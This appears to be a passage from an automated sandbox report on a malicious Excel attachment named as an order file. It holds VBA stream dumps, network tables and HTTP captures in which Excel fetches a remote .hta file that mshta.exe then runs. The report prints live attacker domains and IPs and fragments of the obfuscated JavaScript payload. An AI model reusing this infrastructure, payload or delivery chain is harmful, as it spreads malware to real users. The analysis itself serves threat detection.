        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 4a 09 fe d5 1e b9 f0 73 14 68 07 31 15 b7 87 8e 40 1e 0c ad 50 d4 eb b5 8a bb 93 4d 56 97 6b 97 d8 16 f4 95 9c 12 86 14 91 8f b0 46 c0 85 99 ef e1 00 02 00 b0 04 c1 00 02 00 8e 74 e2 00 00 00 5c 00 70 00 9e 16 99 b9 ed 5c b8 da 0a dd f3 0b 56 40 27 50 9b 11 2c 42 19 e3 51 0f 00 59 16 65 82 ce
        General
        Stream Path:_VBA_PROJECT_CUR/PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:529
        Entropy:5.201958896797205
        Base64 Encoded:True
        Data ASCII:I D = " { 3 C 3 E 0 3 D 8 - 2 5 B 3 - 4 0 8 0 - 9 F 1 4 - E 1 B 0 F 1 D 1 0 F 4 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 3 9 1 5 A 0 8 A 8 0 C A 8 0 C A
        Data Raw:49 44 3d 22 7b 33 43 33 45 30 33 44 38 2d 32 35 42 33 2d 34 30 38 30 2d 39 46 31 34 2d 45 31 42 30 46 31 44 31 30 46 34 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
        General
        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
        CLSID:
        File Type:data
        Stream Size:104
        Entropy:3.0488640812019017
        Base64 Encoded:False
        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
        TimestampSource PortDest PortSource IPDest IP
        Dec 18, 2024 15:15:23.358563900 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:23.358618975 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:23.358690023 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:23.358994961 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:23.359009981 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:24.796669006 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:24.796786070 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:24.801738977 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:24.801745892 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:24.802061081 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:24.802359104 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:24.802608967 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:24.843323946 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:26.086081028 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:26.086146116 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:26.086174011 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:26.086210966 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:26.086267948 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:26.086317062 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:26.086329937 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:26.086370945 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:26.091344118 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:26.091362000 CET44349732170.82.174.30192.168.2.9
        Dec 18, 2024 15:15:26.091371059 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:26.091423035 CET49732443192.168.2.9170.82.174.30
        Dec 18, 2024 15:15:26.094347000 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:26.213949919 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:26.214029074 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:26.214504957 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:26.335601091 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341439962 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341453075 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341465950 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341576099 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.341626883 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341634989 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341646910 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341654062 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341662884 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.341680050 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.341701984 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.341715097 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.344177008 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.344186068 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.344234943 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.461692095 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.461709023 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.461755991 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.465609074 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.465828896 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.533757925 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.533837080 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.533936024 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.533979893 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.537935019 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.538410902 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.538738012 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.546572924 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.546690941 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.546750069 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.554958105 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.555161953 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.555342913 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.563527107 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.563729048 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.563914061 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.571897030 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.572060108 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.572196007 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.580518961 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.580532074 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.580612898 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.589449883 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.589457989 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.589518070 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.598161936 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.598170042 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.598273039 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.605916023 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.607384920 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.607578039 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.614511967 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.614518881 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.614583015 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.623382092 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.623450041 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.630901098 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.630937099 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.725965023 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.725979090 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.726031065 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.728342056 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.728385925 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.729198933 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.729265928 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.729341984 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.729397058 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.734253883 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.734327078 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.734334946 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.734450102 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.739382982 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.739448071 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.739454985 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.739521027 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.744281054 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.744333982 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.744421005 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.744487047 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.749104023 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.749142885 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.749190092 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.753750086 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.753839016 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.753911972 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.758615971 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.758699894 CET8049733173.214.167.74192.168.2.9
        Dec 18, 2024 15:15:27.758698940 CET4973380192.168.2.9173.214.167.74
        Dec 18, 2024 15:15:27.758783102 CET4973380192.168.2.9173.214.167.74
        TimestampSource PortDest PortSource IPDest IP
        Dec 18, 2024 15:15:22.852731943 CET6156953192.168.2.91.1.1.1
        Dec 18, 2024 15:15:23.280409098 CET53615691.1.1.1192.168.2.9
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Dec 18, 2024 15:15:22.852731943 CET192.168.2.91.1.1.10xaeafStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Dec 18, 2024 15:15:23.280409098 CET1.1.1.1192.168.2.90xaeafNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
        Dec 18, 2024 15:15:23.280409098 CET1.1.1.1192.168.2.90xaeafNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
        Dec 18, 2024 15:15:23.280409098 CET1.1.1.1192.168.2.90xaeafNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
        Dec 18, 2024 15:15:32.457603931 CET1.1.1.1192.168.2.90xcdd9No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
        Dec 18, 2024 15:15:32.457603931 CET1.1.1.1192.168.2.90xcdd9No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
        • curt.wiz.co
        • 173.214.167.74
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.949733173.214.167.74807188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        TimestampBytes transferredDirectionData
        Dec 18, 2024 15:15:26.214504957 CET268OUTGET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Connection: Keep-Alive
        Host: 173.214.167.74
        Dec 18, 2024 15:15:27.341439962 CET1236INHTTP/1.1 200 OK
        Date: Wed, 18 Dec 2024 14:15:27 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Last-Modified: Wed, 18 Dec 2024 00:54:55 GMT
        ETag: "24058-62980dcb22508"
        Accept-Ranges: bytes
        Content-Length: 147544
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/hta
        Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
        Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%32%25%33%36%25%33%31%25%33%34%25%33%32%25%33%31%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%32%25%33%33%25%33%33%25%33%34%25%33%30%25%33%38%25%33%31%25%33%
        Dec 18, 2024 15:15:27.341453075 CET1236INData Raw: 33 37 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 37 25 33 33 25 32 35 25 33 32 25 33 30 25 32 35 25 33 33 25 36 34 25 32 35 25 33 32 25 33
        Data Ascii: 37%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%30%25%35%64%25%32%39%25%33%62%25%30%
        Dec 18, 2024 15:15:27.341465950 CET1236INData Raw: 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 33 33 25 32 35 25 33 36 25 33 38 25 32 35 25 33 36 25 33 31 25 32 35 25 33 37 25 33 32 25 32 35 25 33 34 25 33 31 25 32 35 25 33 37 25 33 34 25 32 35 25 33 32 25 33 38 25 32 35 25 33 36 25 33 39 25 32
        Data Ascii: 25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%35%25%36%62%25%32%65%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%39%25%32%39%25%35%65%25%37%33%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%
        Dec 18, 2024 15:15:27.341626883 CET1236INData Raw: 36 35 25 32 35 25 33 36 25 33 37 25 32 35 25 33 36 25 33 36 25 32 35 25 33 31 25 36 33 25 32 35 25 33 31 25 33 39 25 32 35 25 33 35 25 33 38 25 32 35 25 33 36 25 36 32 25 32 35 25 33 36 25 33 31 25 32 35 25 33 36 25 33 39 25 32 35 25 33 36 25 33
        Data Ascii: 65%25%36%37%25%36%36%25%31%63%25%31%39%25%35%38%25%36%62%25%36%31%25%36%39%25%36%31%25%36%31%25%36%65%25%33%66%25%31%65%25%34%34%25%34%36%25%33%39%25%34%32%25%36%65%25%37%31%25%36%66%25%35%61%25%36%65%25%36%38%25%34%35%25%34%37%25%33%30%25%31%
        Dec 18, 2024 15:15:27.341634989 CET1236INData Raw: 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32
        Data Ascii: 25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%
        Dec 18, 2024 15:15:27.341646910 CET1236INData Raw: 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33
        Data Ascii: 30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%
        Dec 18, 2024 15:15:27.341654062 CET776INData Raw: 33 37 25 32 35 25 33 35 25 33 36 25 32 35 25 33 35 25 33 35 25 32 35 25 33 34 25 36 35 25 32 35 25 33 37 25 33 31 25 32 35 25 33 36 25 33 34 25 32 35 25 33 35 25 33 34 25 32 35 25 33 36 25 33 39 25 32 35 25 33 36 25 33 31 25 32 35 25 33 35 25 33
        Data Ascii: 37%25%35%36%25%35%35%25%34%65%25%37%31%25%36%34%25%35%34%25%36%39%25%36%31%25%35%35%25%36%32%25%36%38%25%37%34%25%34%64%25%33%35%25%36%64%25%34%61%25%34%32%25%33%65%25%36%39%25%34%31%25%34%65%25%34%66%25%36%66%25%35%62%25%35%33%25%34%37%25%33%
        Dec 18, 2024 15:15:27.341662884 CET1236INData Raw: 25 32 35 25 33 34 25 36 35 25 32 35 25 33 34 25 33 32 25 32 35 25 33 36 25 33 35 25 32 35 25 33 36 25 36 35 25 32 35 25 33 35 25 36 34 25 32 35 25 33 35 25 36 31 25 32 35 25 33 37 25 33 34 25 32 35 25 33 36 25 33 33 25 32 35 25 33 37 25 33 30 25
        Data Ascii: %25%34%65%25%34%32%25%36%35%25%36%65%25%35%64%25%35%61%25%37%34%25%36%33%25%37%30%25%36%38%25%35%35%25%34%62%25%34%65%25%34%61%25%37%31%25%36%30%25%37%36%25%37%33%25%34%30%25%34%38%25%37%36%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32
        Dec 18, 2024 15:15:27.344177008 CET1236INData Raw: 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25
        Data Ascii: %30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25
        Dec 18, 2024 15:15:27.344186068 CET1236INData Raw: 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25
        Data Ascii: %35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30
        Dec 18, 2024 15:15:27.461692095 CET1236INData Raw: 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25
        Data Ascii: %25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.949732170.82.174.304437188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        TimestampBytes transferredDirectionData
        2024-12-18 14:15:24 UTC236OUTGET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: curt.wiz.co
        Connection: Keep-Alive
        2024-12-18 14:15:26 UTC995INHTTP/1.1 302 Found
        Date: Wed, 18 Dec 2024 14:15:25 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 120
        Connection: close
        Set-Cookie: sess=123; path=/; Secure; HttpOnly
        Location: http://173.214.167.74/xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
        Strict-Transport-Security: max-age=31536000; includeSubDomains
        x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
        X-DNS-Prefetch-Control: off
        X-Frame-Options: SAMEORIGIN
        X-Download-Options: noopen
        X-Content-Type-Options: nosniff
        X-XSS-Protection: 1; mode=block
        Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
        Referrer-Policy: strict-origin
        Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
        X-GoCache-CacheStatus: BYPASS
        2024-12-18 14:15:26 UTC120INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 33 2e 32 31 34 2e 31 36 37 2e 37 34 2f 78 61 6d 70 70 2f 64 63 76 2f 67 72 65 61 74 69 6e 64 69 61 6e 63 6f 6d 70 61 6e 69 65 73 67 69 76 65 6e 62 65 73 74 67 69 66 74 66 6f 72 79 6f 75 72 68 65 61 6c 74 68 67 69 76 65 6e 67 6f 6f 64 72 65 74 75 72 6e 73 2e 68 74 61
        Data Ascii: Found. Redirecting to http://173.214.167.74/xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:09:14:23
        Start date:18/12/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
        Imagebase:0x200000
        File size:53'161'064 bytes
        MD5 hash:4A871771235598812032C822E6F68F19
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:7
        Start time:09:15:26
        Start date:18/12/2024
        Path:C:\Windows\SysWOW64\mshta.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
        Imagebase:0x290000
        File size:13'312 bytes
        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        Target ID:9
        Start time:09:15:28
        Start date:18/12/2024
        Path:C:\Windows\splwow64.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\splwow64.exe 12288
        Imagebase:0x7ff7fb730000
        File size:163'840 bytes
        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:12
        Start time:09:16:05
        Start date:18/12/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls"
        Imagebase:0x200000
        File size:53'161'064 bytes
        MD5 hash:4A871771235598812032C822E6F68F19
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        No disassembly